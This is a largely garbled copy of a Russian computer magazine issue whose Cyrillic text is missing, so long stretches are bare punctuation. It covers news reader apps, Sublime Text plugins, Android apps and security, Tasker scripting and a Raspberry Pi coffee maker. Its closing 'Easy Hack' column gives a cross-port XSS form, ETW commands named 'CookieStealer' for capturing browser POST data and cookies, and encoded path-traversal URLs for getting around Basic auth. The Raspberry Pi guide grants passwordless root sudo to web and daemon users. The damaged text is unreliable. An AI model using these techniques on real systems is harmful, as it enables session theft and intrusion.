
:
RSS:

Prismatic
getprismatic.com
Twitter-
, .
. , ,
( ).
. , .
Prismatic - , ,
.
IT , , .

: 6
: 7

: Free
:

:
RSS:

Pulse
pulse.me

Pulse.
. ,
Pulse . ,
.
.
,
. , ,
.
. .

: 4
: 8


: Free
:

:
RSS:


PC ZONE

Surfingbird
surfingbird.ru
Surfingbird StumbleUpon. , .
, , .
, , ,
. .
. Surfingbird ,
, . , , .
. (
), - - .

: 6
: 8

: Free
:

:
RSS:

Google Currents
https://google.com/producer/currents
.
- Pulse. . , .
.
,
. , ,
( Google Reader)
. , .
. IT- GC
, IT-.

: 9
: 9

: Free
:

:
RSS:

Flipboard
flipboard.com
Flipboard
. (
), . Flipboard .
, , Flipboard
Google Reader. Twitter-,
. , , .
.
,
.
Flipboard Google Media.

: 9
: 9


: Free
:

:
RSS:


Zite
zite.com
Flipboard , Zite
. (Twitter, Pocket, Google Reader, FB),
.
, .
.
. ,
,
.
: - , ,
-, . , Zite
.
, .

: 8
: 10

: Free
:

:
RSS:





RSS


StumbleUpon     7/10    8/10
Prismatic       6/10    7/10
Pulse           4/10    8/10
Surfingbird     6/10    6/10
Google Media    9/10    9/10
Flipboard       9/10    9/10
Zite            8/10    10/10

THERE'S NO SCHOOL LIKE THE OLD SCHOOL


- RSS-
, . Newsblur (newsblur.com),
,
( ?). ,
,
Newsblur.
TinyTinyRSS (tt-rss.org),
, -
.
Google
Reader
.


PC ZONE

RSS-
FeedDemon
feeddemon.com
Windows RSS-,
FeedDemon.
(Standart Pro). . Google Reader . ( Windows XP).

. (
IE) , offline.
. readability,
. , ,
. , .
: , - . MS Outlook.

: Shareware/Free

: Windows

NetNewsWire
netnewswireapp.com
NetNewsWire MS Outlook.
NetNewsWire
: Google Reader, , Instapaper . NetNewsWire
AppleScript. ( ), . , , ,
NetNewsWire .
: AppleScript .

: Shareware/Free

: Mac OS

: iOS

Liferea
liferea.sourceforge.net
Liferea RSS- Linux. Google Reader TinyTinyRSS,
, - -.
CSS. ,


LightRead (https://launchpad.net/lightread).
: RSS- Linux,
, , .

: Open Source


: Linux/BSD



- , . ,
- : , , . , , / . - ,
. .

Safari

Firefox

( Safari Mac OS)


. ,
/ ( , ),
Read.
,
.
(, ) ,
.

Clearly Firefox, Google


Chrome.
. Clearly , -
. Evernote.
.
.

Opera

Google Chrome

CleanPages. ,
Opera .
( ), Chrome Firefox, . ,
.

iReader. ,
Reader Safari.
. , , (
Safari) iReader . ,
Reader, iReader.
, iReader
Twitter, Facebook Flickr.


PC ZONE

Sublime Text 2

JQUERY-

Sublime Text . !
, , , ,
. :
.
, Sublime
Text, jQuery-.


SUBLIME TEXT 2
Sublime Text 2 .

. plain text Ruby, Python
. 154 2011 ,
.
.

,
www.sublimetext.com. 59 Sublime Text (ST),
. , ,
UNREGISTERED .


Sublime Text 2

, portable-. ,
. , , ,
.
win, .

,
Sublime Text,

, . :
, ST .
, .
! . ,
Sublime Text, .
Sublime Text .
, <Alt + F3>.
(<Ctrl + H>, )! , ,
.
<Ctrl> ,
.

, .
, (<Ctrl + K>, <Ctrl + B>), .
, ,
AdvancedNewFile.
, ,
<Ctrl + Alt + N> ( , ). ,
.
Sublime,
Find, .
,
, , IDE-.
ST . <Ctrl + P/R/G> /
/.
, , . Sublime Text
<F11>.
<Shift + F11>. <Alt +
>. (layouts) <Shift + Alt + >.
, : is.gd/dl0PIH.
: is.gd/BbMCyh.

SUBLIME PACKAGE CONTROL



Sublime Text Packages.
, .
,
Preferences Browse packages "Documents
and Settings\ \Application Data\Sublime Text 2\
Packages" ("Data\Packages" portable-). Sublime Package Control (SPC).
, ,
GitHub, BitBucket JSON-, . ,
. is.gd/5soWAS,
.
, Sublime Text (<Ctrl + >) ,
Installation wbond.net (bit.ly/wgKqFq) ( ,
). Sublime.
<Ctrl +
Shift + P> ( Preferences Package Control).
, Install Package,
. , <Enter>.
().
.
, GitHub/
BitBucket/JSON, SPC.

JQUERY PACKAGE

, , . Sublime Text , jQuery
. JavaScript JSON,
jQuery . jQuery
Package (is.gd/am3SkN) .
,
Preferences Color Scheme. jQuery Package
( ). ,
jQuery Mobile, jQuery Mobile Snippets:
is.gd/o8M4yj.

DETECTSYNTAX

Sublime Text ,
. , ,
. DetectSyntax (is.gd/elmHcX) .

Sublime Package Control,


PC ZONE
, jQuery,
Packages/User/DetectSyntax.sublime-settings :
DetectSyntax.sublime-settings
{
"name": "jQueryJavaScript",
"rules": [
{ "file_name": ".*\\.js$" }
]
}

jQueryJavaScript ,
jQuery, name Packages\
jQuery\Syntaxes\jQueryJavaScript.tmLanguage. first_line .
(rules) RegExp. Packages/DetectSyntax/DetectSyntax.sublime-settings
User.
, .

Zen Coding

JSFORMAT

.
, . JS , JsFormat (is.gd/Rbhdci) . :
JS-, ,
<Ctrl + Alt + F>.
JsFormat/JsFormat.sublime-settings , - ,
. :
"max_preserve_newlines": 4 ;
"preserve_newlines": true ;
"jslint_happy": false jslint-stricter;
"brace_style": "collapse" [collapse|expand|endexpand|expand-strict] ( collapse);
"keep_array_indentation": false .

JSMINIFIER:
JS
, . JsMinifier (is.gd/8xhs7q) , Google
Closure Compiler UglifyJS: , , , . <Ctrl + Alt + M>, :).
, <Ctrl + Alt + Shift + M>,
.


SUBLIMELINTER

, .
SublimeLinter
(is.gd/loZ31q),
JavaScript (. is.gd/hFXnuV ). SublimeLinter jshint,
jslint gjslint.
SPC,
Windows nodejs.org. ,
Preferences Package Settings SublimeLinter Settings
Default sublimelinter_executable_map
node.exe, -


.
.
(Background mode), - . :
Load-save mode (/),
Save-only mode ( ),
On demand mode ( ,
<Ctrl + Alt + L>).
SublimeLinter JavaScript,
Python, Perl, Ruby, CSS .


BRACKETHIGHLIGHTER
, , , jQuery (is.gd/v1hfo2) , .
.

ZEN CODING HTML


HTML jQuery- , . Zen Coding (is.gd/hNDhz5) ,
.
: vimeo.com/7405114.
DOCTYPE HTML- <Ctrl + Alt + Shift + H>. :
1) , , zen, <Ctrl + Space> <Tab>
HTML;
2) zen- (<Ctrl + Alt + Enter>)
. zen_as_you_type.
: is.gd/RUlqj2.
Zen Coding Tag,
HTML , is.gd/X9I05R.


Sublime Text ,


Sublime Text 2

<![CDATA[if (typeof jQuery == 'undefined') { \


${0: $SELECTION } // , jQuery
,
.
}]]>
</content>
<tabTrigger>undefined</tabTrigger>
</snippet>

,
$SELECTION . $SELECTION , . $1 ..
$n ,
<Tab>. , $1 .
. :
,
Tab, ( ). ,
:

jQuery + Twilight

.
, (. is.gd/lqPwyx).

<Tab>.
Tools Snippets,
, .
, . (is.gd/55pLi7) ,
JQuery Package, Packages\jQuery.

Tools New Snippet. ,
.

<snippet>
<content>
<![CDATA[Hello, ${1:this} is a ${2:snippet}.]]>
</content>
<!-- <tabTrigger>hello</tabTrigger> -->
<!-- <scope>source.python</scope> -->
</snippet>

:
snippet , ;
content ,
: <![CDATA[ ]]>;
tabTrigger (hello) <Tab>
;
scope ,
.
, <scope>source.html</scope> HTML-;
description .
.

<snippet>
<content>



<string>
.hide(${1/(^[0-9]+$)|.+/(?1::')/}
${1:slow/400/fast}${1/(^[0-9]+$)|.+/(?1::')/}, function() {
${0: // , };
});
</string>

1:slow/400/fast , 0://... .
, .
$PARAM1 .. $PARAMn ,
insertSnippet
$SELECTION ,

$TM_CURRENT_LINE ,

$TM_CURRENT_WORD ,

$TM_FILENAME ,

$TM_FILEPATH ()
$TM_FULLNAME
$TM_LINE_INDEX ,
, 0
$TM_LINE_NUMBER , ,
1
$TM_SELECTED_TEXT $SELECTION
$TM_SOFT_TABS YES, translateTabsToSpaces ,
NO.
$TM_TAB_SIZE (
tabSize)

Packages User _.
sublime-snippet, .
.
,
SaneSnippets, .

, Sublime Text , jQuery.


,
.
, , .
! z


(androidstreet.ru)
(appstudio.org)

X-MOBILE

,
,

,
.

,
,
,
.

Android
Titanium Backup
Android 1.0
matrixrewriter.com/android/


, , ,
. Titanium Backup
Android- .
,
, ,
,
.
188 , , , Dropbox Google Drive,
SMS MMS, , , ,
,
, ClockworkMod, .
-, .


Ghost
Commander
Android 1.6
goo.gl/DbtXw

AirDroid
Android 2.1
airdroid.com

Ghost Commander
Android.

:

, Norton
Commander Far.
,
. , root, ,
,
, ZIP-, FTP- SMB-.

.

AirDroid



.
,
/
, /
SMS, , ,

, .
Wi-Fi, ,
AirDroid.

Pocket

Barcode Scanner

Android 2.2
getpocket.com

Android ( )
goo.gl/eWoL

-
, ,
Pocket. ,
,
, ,
.

Android iOS,
, ,
, Pocket
.

- ,


, QR-.
,
.
QR- Google Play.
, Barcode
Scanner. , , ,
, .

Prey Anti-Theft

Shazam

Android 1.6
preyproject.com

Android (
)
shazam.com


.
Prey,
.
,
-
preyproject.com, , ,
GPS,
SIM-, .
,
.

,
.


,

, . XXI

. Shazam
,
,
, , , .

, -.
, ,
,
.


X-MOBILE
CluBalance

SystemPanelLite

Android 1.6

Android 1.5


.
,
CluBalance,

.
,
.
, , ,
( , SMS, )
.

Android- ,
,

-. , SystemPanel,

, , , ,
, .
.

iOS
Bump
iOS 4.1
https://bu.mp

GoodReader
for iPhone
iOS 4.0
goodreader.com
4,99 $

iPhone
Apple,

, -
iOS.
:
, iMessage ,
( iOS/
Mac), Bluetooth Wi-Fi
iOS . App Store
,
. , Bump. ,
iOS, Android,
: .

GoodReader

PDF-, ,

iOS.
GoodReader
Microsoft Office, iWork, txt, RTF, .
,
WebDAV, FTP, SFTP AFP, iCloud, Dropbox, SkyDrive SugarSync. ,
iPhone .
PDF, GoodReader ,
300 .

iCab Mobile

PhotoForge2

iOS 3.1
www.icab-mobile.de
1,99 $

iOS 4.2
photoforge2.com
2,99 $

Safari, iOS,
iCab Mobile . ,
, , ,
, ,
Dropbox Firefox Sync, Safari. iCab Mobile
, .
.

, App Store .
, .
PhotoForge2 .
, ,
, , 25
, , , , , .
,
, .


Launch Center
Pro
iOS 5.1
appcubby.com/launch-center
2,99 $

TuneIn Radio
iOS 4.0
tunein.com/mobile/ios

iPhone
,
,
.
Launch Center Pro
iPhone. : , (, , ).
Launch Center Pro ,
. ,

, .

iPhone FM, Apple


iOS.
,

, -. , ,
TuneIn Radio, iOS .
70 000 (
),
,
. AirPlay.

Air Video

AVPlayer

iOS 4.3
www.inmethod.com/air-video
2,99 $

iOS 4.0
eplayworks.com
2,99 $

AVPlayer,
,

iOS-. Air
Video,
iPhone, iPod touch iPad. :
, (,
PC), Air Video,
,
. Air Video
iOS-,
.
, iPhone,
.

Apple


, -
iOS
App Store.

AVPlayer,
( AVI WMV XVID MKV)
. MKV, AVI, MP4, MOV M4V
1080p. ,
AVPlayer .
, , .

iTranslate Voice

AppShopper

iOS 4.3
www.itranslatevoice.com
0,99 $

iOS 4.3
appshopper.com

Siri ,
. ,
Siri ,

. ,
Siri ,
?
iTranslate Voice,
. ,
. iPhone .
, ,
, SMS Twitter.

App Store :
, App Store,

.
,
. App Store ,
,
Apple.
AppShopper,
iOS-.
, wish- ,
, .
, .


X-MOBILE

(androidstreet.ru)


ANDROID
Android , , , .

Android -, .
?

Android

: Google
,

Android. ,
, ,
.
,
Linux,
root,
, .

, ,
.
?
?
Android
iOS ,


, ?
.

?
Android
Linux,
. Linux
, ,

. ,
Android
,
.

: .
Android
.
(UID)
/data,
,

,
.
Android
(sandboxing),
, ,
.
,
.
Android root, zygote,
, . ,
,
,
, SD-,

( ).
,
Android, NAND-
/system. , ,

( /data), -


(, ,
root, ).
IPC,


Linux , ,
, , ,

, Android NDK.
Binder

(
).
, Android,
2.2, ,
, UNIX Windows.
API, ,


. ,

Android,
.
API
,

.
Android

,
.

.
3.0, Android
dmcrypt Linux.
/data AES128 CBC

ESSIV:SHA256 , ,
.
, ,

.


, Android

Android (),
,
.

, ,
(
)
( SMS
).
Android :
,
Android .
AndroidManifest.xml APK-

,
,
.
.
Android
,
, ,
.
-

[Figure: Android diagram with blocks SMS/MMS, IM, Email, IPC, XMPP, Surface Manager, Media Framework, SQLite, OpenGLES, FreeType, LibWebCore, Dalvik, SSL, Libc, Bluetooth, Binder, USB, WiFi, SGL, Linux]

, ,
- (,
SMS ),

.

.
,
, . ,

SMS,
.
,
Google

( ),
.
,
,
. ,
, Google
Android ,
SD-.
,

, , , GPS,

GPS.

. ,
SIM-
, , .

, Linux,
root
, - , .

,
, Android
Binder, (Intents)
(Content Provider).
(RPC),
Linux, Service Manager.

Binder
,
. ,

, .
, Android Binder ,


, UID ,

, ,
.

. ,


.

Android-. , API ,
AndroidManifest.xml .
(Content
Provider), (
Binder),

. Android
, , -, .
.
Binder , .
- . ,
, -,
,
URI. ,
( , URI), URI ( ,

, ). ,

,
. , URI,
.
,
, Android
,
,
,
.

. ,
Dropbox Android
, ,
Dropbox
(www.securelist.com/en/
advisories/45572).



, Android NDK,
, , Android

,
. Android 1.5
safe-iop (code.google.com/p/
safe-iop),

( integer overflow).
OpenBSD
dmalloc,
,
calloc
. Android, 1.5,

GCC ProPolice
.
2.3

, '-Wformat-security',
'-Werror=format-security',

( No eXecute (NX),
ARMv6). Android 2.3
,
2009 Linux 2.6 (
NULL-),
/proc/
sys/vm/mmap_min_addr.
Linux,
.
4.0, Google
Android Address space layout
randomization (ASLR),
,
, .

, . , 4.1, Android
RELRO (Read-only
relocations),
,

ELF-. 4.1
dmesg_restrict
(/proc/sys/kernel/dmesg_restrict),
2.6.37 (dmesg)
.


Google Play ( Android Market)
Android. ,
,
,

,
,
.

, -
.
, ,


Binder

IPC

Binder

, Google Play,
.
, ,
Android.
,
, Apple App Store,
Google
Bouncer,
,
.
Bouncer , , ,

,
,
SMS .
Google, Bouncer
40%. ,
,
: (e-mail-
, )
, ,

.
, Google
Bouncer
,
Google Play,
,

.


. -
OpenBSD ,
,
Google .
Google
Android (Android Security
Team), ,
,
, , -.
:

. Android
.
, Google Information
Security Engineering team
.
.

.
,
-.

,
:
1. ,
OHA (Open Handset Alliance), .
2. ,
.
3. , , OHA.
4. Android Open
Source Project.
5. / OTA

.

, OHA,
.
,
,
AOSP.
(, ),

AOSP,

.

,
,
.

,
Android
,
. ,
Android ,
.
.
,
,
OpenBSD ,
. z


, ,
,
Android, -


ps ,


X-MOBILE

(gotsijroman@gmail.com)

www.flickr.com/photos/laihiu

ANDROID
, . , ,
.
- ,
. Android

Tasker
SL4A, ,
, .
TASKER
Tasker , Android.

,
. , , Tasker
. .
? , . , ,
? ? , Tasker
. , SMS, ,
. Tasker
.


3,49 ( ), , , trial-
tasker.dinglisch.net. :
,
, . ,
, Google Play -
.


, . (
Preferences Language) ( ,
. . .).
. : Profiles,
Tasks Scenes ( 1).
Profiles , , .
,
, , ,
, GPS
.
, .
, .
,
,
( ),
.
, - .


1: Tasker

2:

,
.
.
. ,

. ,
, . : ,
.


, : ,
.
+ .
.
, ,
( ).
( 2).
:
. ,
, , . , ,
.
. ,
. ,
,
.
. ,
. .
. ,
, (. ).
.


3:

. . ,
, ,
Wi-Fi- ,
(-, :)).

( 3). Sensor, .
.
.
. ,
. ( , ) .


, .
,
( 4). ,
. ,
, ,
.
( , : goo.gl/cdHXh).
.
,
, ,
.
,
.
, ;
. ,
: , . Call,
.

, Any, . ,
, Tasker ,
Call , , ,
. ! . ,
, , . , ?




. , ,
.
. .
.
( )
. Sensor,
Shake. , .
! ; . .
. (
) .

. , , .

SCRIPTING LEVEL FOR ANDROID


Tasker, . Tasker ,
, UI
(
Scenes). , , , SL4A.
SL4A (Scripting Level for Android) ( ) Android Python, JavaScript, Perl,
Ruby, Lua, BeanShell Tcl. API
Android JSON RPC
Android,
, SMS, GPS,
, GUI.
- Python,
.
SL4A
(goo.gl/uG6X4) Python (goo.gl/8IPwY). Python Install,
Android.


, , ,

. , GPS ,
, 30 999 .
, ,
GPS, . ,
, , .


4:

. , , SL4A/Scripts .
SL4A,
Add, Python. . ,
:
import android
droid = android.Android()

API
, API .
API ,
( API SL4A : goo.
gl/lVfd9). makeToast,
. :
#
droid.makeToast("Hello world!")
print("Hi from Python")

, .
, 5. , .


- .
SMS-
,
. play music,
.
import android
droid = android.Android()


INFO

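# Get the list of SMS messages (False = all messages, not only unread ones)
msgs = droid.smsGetMessages(False).result
# Take the most recent message
lastmessage = msgs[0]
# Check whether it contains the command
if "play music" in lastmessage['body']:
    # Start playing the track
    droid.mediaPlay('/sdcard/music/track.mp3')
    # Reply to the sender to confirm that the command was executed
    droid.smsSend(lastmessage['address'], "Command complete")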

, , Tasker
. . .
. , (
)
ID3- MP3-. , .
Stagger (goo.gl/WBiQ5).
, SL4A pure Python
, com.googlecode.python.
python3forandroid/extras/python3 .
, ,
MP3- :


Tasker
,
.
, Locale
plugin.
SL4A
Android.
Kivy
(kivy.org/docs/guide/
android.html).

5: SL4A-

, Tasker,
APK
Tasker App Factory:
goo.gl/Fi0Em.
SL4A: goo.gl/R7MTv.

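import os

# Walk the SD card looking for MP3 files
for (dirName, dirs, files) in os.walk(r'/sdcard'):
    for filename in files:
        try:
            if filename.endswith('.mp3'):
                pathname = os.path.join(dirName, filename)
                #
        except Exception as e:
            # Report files that could not be processed and keep going
            print(e)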


SL4A
,
:
.encode('cp1251').
decode('utf8').

WWW

, ,
.
Tasker.

SL4A:
goo.gl/X2CvB;
Tasker:
goo.gl/wJZkb;
Tasker
4pda.ru: goo.gl/
Q1hWX.


SL4A
: webViews (HTML5 + JavaScript), fullScreenAPI ( : goo.gl/OCQdw) dialogAPI,
. FTP-.
, , dialogAPI.
# glob
# filesNames
...
# ,
droid.dialogCreateAlert(" ", " \
")
#
droid.dialogSetMultiChoiceItems(filesNames)
#
droid.dialogSetPositiveButtonText("OK")
droid.dialogSetNegativeButtonText("")
# ,
droid.dialogShow()
# , (positive, negative
# neutral)
if droid.dialogGetResponse().result['which'] == \
"positive":




,


.

: goo.
gl/1jPxP.

DVD

6: HelloWorld.py


, Python Stagger

Tasker.

#
res = droid.dialogGetSelectedItems().result
# ftplib,
...

?
Tasker SL4A Android . SL4A
Android. , , , . z


PHREAKING

Alexander Lykoshin (alykoshin@gmail.com, ligne.ru)


RASPBERRY PI
1998
HTCPCP/1.0
. , ,
Raspberry Pi.

,
. 1998-
,
. , RPi, . 2560
8-
8090- , - Wi-Fi,
.
.
, RPi, RPi Wi-Fi.
, .
, , -. , ,
.
SSH,
,
.


. :
, , , , .
. ,
, .
,
: .
.
,
,
Moulinex BCA 1.L1 Little Solea.
640 , 0,6 .


RPi
(. 2), - USB-


USB- .
, -
, , USB-
.
, ,
. overscan,
.



Raspbian, Debian, .
bit.ly/PhB13h ( Raspbian
wheezy), , Linux,
.
, , , Windows,
Win32DiskImager ( ), SD-,
2 . SD-
(bit.ly/R2Mm96),
, .
RPi , , ,
, SD.
SD- RPi,
( pi, raspberry) , 2 SD-
SSH. , ,
, .
,
RPi. ,
.
:
$ sudo raspi-config


. 1. raspi-config

:
$ sudo reboot

RPi
, .
$ sudo apt-get update
$ sudo apt-get upgrade

ETHERNET WI-FI
Wi-Fi- D-Link DWA-140 B2
bit.ly/SVSJtY. , , :
$ lsusb
<..>
Bus 001 Device 006: ID 07d1:3c0a D-Link System DWA-140 RangeBooster N Adapter(rev.B2) [Ralink RT3072]
$ iwconfig
lo        no wireless extensions.
eth0      no wireless extensions.
wlan0     IEEE 802.11bgn  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm
          Retry long limit:7   RTS thr:off   Fragment thr:off
          Power Management:on

Wi-Fi (bit.ly/Sneinf).

SSH VNC
SSH . Windows- Putty,
Irssi ConnectBot.

SSH RPi
(, , Motion,
), vncviewer
TightVNC, androidVNC.
VNC, bit.ly/P2xift
bit.ly/UzXRpl.

. 2. GPIO. ,

, RPI (bit.ly/OvWQBH),
USB-
. , Motion (bit.
ly/SMXbkb) Working Devices Non Working Devices.
Working Devices, ,
,
.
$ lsusb
<..>
Bus 001 Device 007: ID 046d:0826 Logitech, Inc.

,
:
$ sudo apt-get install uvccapture
$ uvccapture -S80 -B80 -C80 -G80 -x800 -y600

snap.jpg (
), RPi
Image Viewer.
Motion , , ( ), .
: bit.ly/SMXbkb.
$ sudo apt-get install motion

Motion , :
$ sudo mv /etc/rc2.d/S03motion /etc/rc2.d/K03motion
$ sudo mv /etc/rc3.d/S03motion /etc/rc3.d/K03motion
$ sudo mv /etc/rc4.d/S03motion /etc/rc4.d/K03motion
$ sudo mv /etc/rc5.d/S03motion /etc/rc5.d/K03motion
$ sudo nano /etc/default/motion

# set to yes to enable the motion daemon
start_motion_daemon=yes

- Motion :
$ sudo nano /etc/motion/motion.conf

- MOTION
- Logitech HD
Webcam C525. - -


webcam_localhost off
control_localhost off

,
.
$ sudo nano /etc/motion/motion.conf
# Command to be executed when a motion frame is detected
# (default: none)
on_event_start sudo /home/pi/motion_det

/home/pi/motion_det ,
. root .
Motion (motion) sudoers:
$ sudo visudo

:
motion ALL=(ALL) NOPASSWD: ALL

:
$ sudo motion -n

Motion ,
: //<raspberrypi>:8080. <raspberrypi> IP- RPi.
//<raspberrypi>:8081. Firefox
. Chrome K.
RPi .

$ sudo motion -s



, .
/tmp/motion,
JPG,
SWF. . :
output_normal off
ffmpeg_cap_new off


Hardware revision code   Model
2                        Model B Revision 1.0
3                        Model B Revision 1.0 + ECN0001 (no fuses, D14 removed)
4, 5, 6                  Model B Revision 2.0

WWW
Hyper Text Coffee Pot Control Protocol (HTCPCP/1.0): bit.ly/RqSOcg.

Raspberry Pi

GPIO
RPi -.
GPIO, General Purpose Input/Output, -
. ,
,
?
RPi
.
GPIO- 3,3 . RPi
, 5
.
, , 16 . ,
2 16 , 8 .
3,3 ,
(,
) 2 .
16 , 3,3 .
: bit.ly/Qp4PMk, ,
, : bit.ly/StAFqI.
: bit.ly/StAJXA.
, Revision 1 2,
. ,
, cat /proc/cpuinfo
hardware revision code . Revision 1 2 : bit.ly/QNHKDF.
+5 3,3 , (GND) GPIO 4,
,
. RPi RPi
. ,
. ( ,
)
: bit.ly/QAeNOg.


.
.
.
$ sudo -i

:
$ echo "4" > /sys/class/gpio/export

:
$ echo "out" > /sys/class/gpio/gpio4/direction

:
$ echo "1" > /sys/class/gpio/gpio4/value
. 3.


$ echo "0" > /sys/class/gpio/gpio4/value

:
$ echo "in" > /sys/class/gpio/gpio4/direction

:
$ cat /sys/class/gpio/gpio4/value

:
$ echo "4" > /sys/class/gpio/unexport

,
:
$ sudo nano switch_gpio

:
#!/bin/bash
PORT_NUM=$1
if [ "$2" == "on" ]; then
    NEW_VALUE=1
elif [ "$2" == "off" ]; then
    NEW_VALUE=0
else
    echo "Usage: $0 PORT_NUM on|off"
    exit 1
fi
# Export the GPIO pin if it has not been exported yet
if [ ! -e /sys/class/gpio/gpio$PORT_NUM ]; then
    echo $PORT_NUM > /sys/class/gpio/export
fi
# Read the current pin value
OLD_VALUE=$(cat /sys/class/gpio/gpio$PORT_NUM/value)
if [ "$OLD_VALUE" == 1 ]; then
    OLD_VALUE_TEXT=on
else
    OLD_VALUE_TEXT=off
fi
echo "out" > /sys/class/gpio/gpio$PORT_NUM/direction
echo -ne "Switching GPIO $PORT_NUM from $OLD_VALUE_TEXT to $2..."
echo $NEW_VALUE > /sys/class/gpio/gpio$PORT_NUM/value
echo done.

:
$ chmod +x switch_gpio

:
$ switch_gpio 4 on
$ switch_gpio 4 off

. 4.

: bit.ly/
TSJMbL. , GPIO
, . GPIO , 3,3 ,
.
.
( )
, , . R1 (1 ), 522 (1N4148),
H547. , . .
640 . ,
220 640 / (220/1,41) = 4,1 .

.
, , TRIL-5VDCSD-2CM-R, 5 8
250 .
. ,
,
. +5 ,
RPi, +5 ,

RPi. 220 ,

.
RPi
, ,
, ,
26-, 4- . ,
, , 220 . 0,75, , . .
, 0,75,
, .
: 220 50 ,
, RPi.
,
220 . ,
,
.
.
RPi, 220. . , RPi, 220.
, RPi . , 220 .
220, , 220,
. !

,
, ,
.

WEBIOPI
GPIO
WebIOPi. ,
(/),
.
: bit.ly/UYErPr.
$ sudo apt-get install apache2 php5

WebIOPi rewrite (.htaccess):


$ sudo a2enmod rewrite
$ sudo nano /etc/apache2/sites-enabled/000-default

<Directory /var/www/>
AllowOverride None AllowOverride All:
<Directory /var/www/>
Options Indexes FollowSymLinks MultiViews
AllowOverride All
Order allow,deny
allow from all
</Directory>

Apache (www-data) sudoers:

$ sudo visudo

www-data ALL=(ALL) NOPASSWD: ALL

Apache:
$ sudo /etc/init.d/apache2 restart

WebIOPi:
$ wget http://webiopi.googlecode.com/files/WebIOPi-0.3.tar.gz
$ tar xvzf WebIOPi-0.3.tar.gz
$ sudo mv webiopi /var/www

: //localhost/webiopi.
RPi,
Chromium Midori, NetSurf, Dillo - JavaScript.

. 5. ,

, Motion:
$ nano /home/pi/motion_det

:
#!/bin/bash
/home/pi/switch_gpio 4 on
service motion stop
sleep 1800
/home/pi/switch_gpio 4 off

:
$ chmod +x /home/pi/motion_det

Motion, . ,
motion_det,
GPIO 4, , Motion, 30
, .



- WebIOPi,
.
Motion , 8:00, /etc/crontab:
0 8 * * * echo $(date): $(service motion start) >> /var/log/motion_start.log

Cron :
crontab /etc/crontab


(
, , , ).
, ,
, , . ,
RPi, , , 25 .
,
( ) .
,
. ZygBee,
,
. SMS,
3G-, DTMF, Asterisk
Freeswitch.
iPhone/iPad.
, RPi . z


/ EASY HACK

GreenDog , Digital Security (twitter.com/antyurin)

EASY
HACK
XSS

, -.
,
-
XSS
WordPress . /

.
, ,
. ,
- .
OK? . .
.
(Michal Zalewski) The Tangled
Web: A Guide to Securing Modern Web
. , .
, ZeroNights 2011 . :).
,
. ,
- , .
XSS-.
. ESMTP. ,
(. ][). Command
unrecognized: " ". ,
,
. ,
, ESMTP? ,


WARNING


.
,


,

.

,
. ESMTP
. , .
- ,
-, . , .

HTTP-, , (
-).
<script>alert('xss');</script>.
XSS. :).

XSS


. . -, ,
XSS ,
, .
, . ,
. -, -
, ,
-
. ,
. Chrome , Firefox ( HTML-), IE
HTML ( ). , IE.
. ,
, ,
,
HTML.
,
( ).
,
,
(, , SMTP- 25 ).
, ,
-

.
.
. .
JS ? .
, ,
URL-. < >
%3c %3e. . ,
plain/text multipart/formdata.
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; \
charset=utf-8">
<title>Port reflection XSS trick</title>
</head>
<body>
<form action="http://victom.com:25/"
enctype="multipart/form-data" method="post">
<p>
<input name="xss" value="<script>alert(1);</script>">
</input>
</p>
</form>

<script>document.forms[0].submit();</script>
</body>
</html>


- IIS

,
- / . , / - spider, , ,
,
/.
DirBuster. K. IIS .NET
, .
- ,
-
.
- .
. 500, -
, ,
404 ,
403 ,
. .
, (Soroush Dalili)
(, - ),
.

URL ?aspxerrorpath=/.
,
,
.
, (, - , - aspxerrorpath,


), .
, goo.gl/axK3b. , , ,
.
, , ,
:). .
,
DirBuster, :
Standart Start Point URL Fuzz
?aspxerrorpath=/.

, 500. . :

URL aspxerrorpath,


OLLYDBG

, . .
, , .
.
. OllyDbg ( ImmunityDbg) ,
-, , -, Python-
( ).
bit.ly/IvP4Bv.
, . , (Mario
Vilas), , WinAPI-,
OllyDbg,
win32.hlp. Microsoft
( OllyDbg) .
.
, Microsoft

MSDN.
. .
, Win32.hlp OllyDbg/ImmunityDbg. (<ctrl + F1>
help on symbolic name) -
. MSDN
.

.
:

1.
2.
3.
4.

OllyDbg.
OllyDbg Help Select Api help file.
win32.hlp ( ).
!

, ,
- .

-, , .

. , .
- .
, ,
. ,

. ,

PaulDotCom.com
, , , ,
, HTTPS.

Windows. :).
? , Event Tracing
for Windows (ETW). , :). , ,
- , ,
- .
ETW WinInet API. ,
HTTPS.
, ETW, ,
.


Windows ...

:
1. :
logman start CookieStealer -p \


Microsoft-Windows-WinInet -o cookiesteal.etl ets

start ;
CookieStealer data collector;
-p Microsoft-Windows-WinInet ;
-o ;
ets Event Trace
Sessions.
2. :
wevtutil qe c:\temp\cookiesteal.etl /lf:true | find /i \
"POST"

Wevtutil ;
qe event ;
c:\temp\cookiesteal.etl /lf:true -
+ ;
find /i "POST" , find.

PATH RESTRICTIONS

, ,
, 2006 (goo.gl/Pa2dJ).
(Amit Klein). ,
.
, ,
SOP (same origin policies), , , -,
, .
, (, , )
, path.
? -, ,
, - . ,
www.example.com/admin/,
, www.
example.com/admin/ , www.example.com/
admin/bla-blah/test.php.
-, , Basic-, , , - , HTTP/1.1 401 Authorization Required.
: - .
,
- Authorization: Basic + base64(:).

/bar/


3. :
logman stop CookieStealer

4. :
logman query providers

, , ,
gmail.
POST-. URL , , . , . ... ,
-. c
PaulDotCom.com goo.gl/fNmji.
. -,
, , WinInet API. , Opera, Chrome,
Firefox, .
-, , Microsoft-Windows-WinInet,
(. 4), ETW , :).


,
. , -
401,
realm . , WWWAuthenticate: Basic realm="cisco".
,
/Basic- www.example.com/admin/, XSS www.example.com/public/.
,
TRACE-
( ).
, , ,
JS JS .
, :).
- . -, .
, .

/asdasd/ report
Basic-


Basic- /report/

Win, bar- foo

public ,
admin, . -,
, Basic :).
Basic. , Basic
, ,
. , - ,
. www.example.
com/admin/, www.example.com/admin/
bla-blah/test.php Basic-,
. , www.example.
com/public/, 401,
( , admin),
admin. ,
.
! , cookie,
Basic-.

public, , .
,
admin, - public. , ,
, , .
,
-.


1) www.example.com/admin/%2e%2e/public/ \
(URL-encoded "../")
- public,
IE ok, FF www.example.com/public/
.
2) www.example.com/admin/baz\..\../public/
- Windows
public, IE , FF ok.
3) www.example.com/admin/%u002e%u002e/public/ (UTF-8)
IIS , IE, FF ok.
4) www.example.com/admin%c0%ae%c0%ae/public/ (Overlong \
UTF-8)
IIS , IE, FF ok.
5) www.example.com/admin/%252e%252e /public/ (Double- \
encoded dot)
IIS , IE, FF ok.

, ,
.
-,
- :).
,
.
